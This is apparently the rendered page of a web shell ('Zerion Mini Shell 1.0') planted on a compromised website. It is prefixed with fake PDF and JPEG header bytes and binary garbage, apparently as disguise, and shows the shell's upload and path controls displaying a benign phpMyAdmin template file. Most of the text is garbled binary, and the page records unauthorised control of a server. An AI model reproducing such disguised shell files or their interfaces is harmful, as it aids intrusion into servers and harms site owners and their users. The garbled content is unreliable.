%PDF- %PDF- ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC
Mini Shell

Mini Shell

Direktori : /var/www/html/pma/templates/database/structure/
Upload File :
Create Path :
Current File : /var/www/html/pma/templates/database/structure/check_all_tables.twig

<div class="clearfloat d-print-none">
    <img class="selectallarrow" src="{{ image('arrow_' ~ text_dir ~ '.png') }}" width="38" height="22" alt="{% trans 'With selected:' %}">
    <input type="checkbox" id="tablesForm_checkall" class="checkall_box" title="{% trans 'Check all' %}">
    <label for="tablesForm_checkall">{% trans 'Check all' %}</label>
    {% if overhead_check != '' %}
        / <a href="#" class="checkall-filter" data-checkall-selector=".tbl-overhead">{% trans 'Check tables having overhead' %}</a>
    {% endif %}
    <select name="submit_mult" style="margin: 0 3em 0 3em;">
        <option value="{% trans 'With selected:' %}" selected="selected">{% trans 'With selected:' %}</option>
        <option value="copy_tbl">{% trans 'Copy table' %}</option>
        <option value="show_create">{% trans 'Show create' %}</option>
        <option value="export">{% trans 'Export' %}</option>
        {% if not db_is_system_schema and not disable_multi_table %}
            <optgroup label="{% trans 'Delete data or table' %}">
                <option value="empty_tbl">{% trans 'Empty' %}</option>
                <option value="drop_tbl">{% trans 'Drop' %}</option>
            </optgroup>
            <optgroup label="{% trans 'Table maintenance' %}">
                <option value="analyze_tbl">{% trans 'Analyze table' %}</option>
                <option value="check_tbl">{% trans 'Check table' %}</option>
                <option value="checksum_tbl">{% trans 'Checksum table' %}</option>
                <option value="optimize_tbl">{% trans 'Optimize table' %}</option>
                <option value="repair_tbl">{% trans 'Repair table' %}</option>
            </optgroup>
            <optgroup label="{% trans 'Prefix' %}">
                <option value="add_prefix_tbl">{% trans 'Add prefix to table' %}</option>
                <option value="replace_prefix_tbl">{% trans 'Replace table prefix' %}</option>
                <option value="copy_tbl_change_prefix">{% trans 'Copy table with prefix' %}</option>
            </optgroup>
        {% endif %}
        {% if central_columns_work is defined and central_columns_work %}
            <optgroup label="{% trans 'Central columns' %}">
                <option value="sync_unique_columns_central_list">{% trans 'Add columns to central list' %}</option>
                <option value="delete_unique_columns_central_list">{% trans 'Remove columns from central list' %}</option>
                <option value="make_consistent_with_central_list">{% trans 'Make consistent with central list' %}</option>
            </optgroup>
        {% endif %}
    </select>
    {{ hidden_fields|join('\n')|raw }}
</div>

<div class="modal fade" id="bulkActionModal" data-bs-backdrop="static" data-bs-keyboard="false"
     tabindex="-1" aria-labelledby="bulkActionLabel" aria-hidden="true">
  <div class="modal-dialog modal-dialog-centered">
    <div class="modal-content">
      <div class="modal-header">
        <h5 class="modal-title" id="bulkActionLabel"></h5>
        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="{% trans 'Cancel' %}"></button>
      </div>
      <div class="modal-body"></div>
      <div class="modal-footer">
        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">{% trans 'Cancel' %}</button>
        <button type="button" class="btn btn-primary" id="bulkActionContinue">{% trans 'Continue' %}</button>
      </div>
    </div>
  </div>
</div>

{% if central_columns_work is defined and central_columns_work %}
  <div class="modal fade" id="makeConsistentWithCentralListModal" data-bs-backdrop="static" data-bs-keyboard="false"
       tabindex="-1" aria-labelledby="makeConsistentWithCentralListModalLabel" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="modal-title" id="makeConsistentWithCentralListModalLabel">{% trans 'Are you sure?' %}</h5>
          <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="{% trans 'Cancel' %}"></button>
        </div>
        <div class="modal-body">
          {{ 'This action may change some of the columns definition.[br]Are you sure you want to continue?'|trans|sanitize }}
        </div>
        <div class="modal-footer">
          <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">{% trans 'Cancel' %}</button>
          <button type="button" class="btn btn-primary" id="makeConsistentWithCentralListContinue">{% trans 'Continue' %}</button>
        </div>
      </div>
    </div>
  </div>
{% endif %}

Zerion Mini Shell 1.0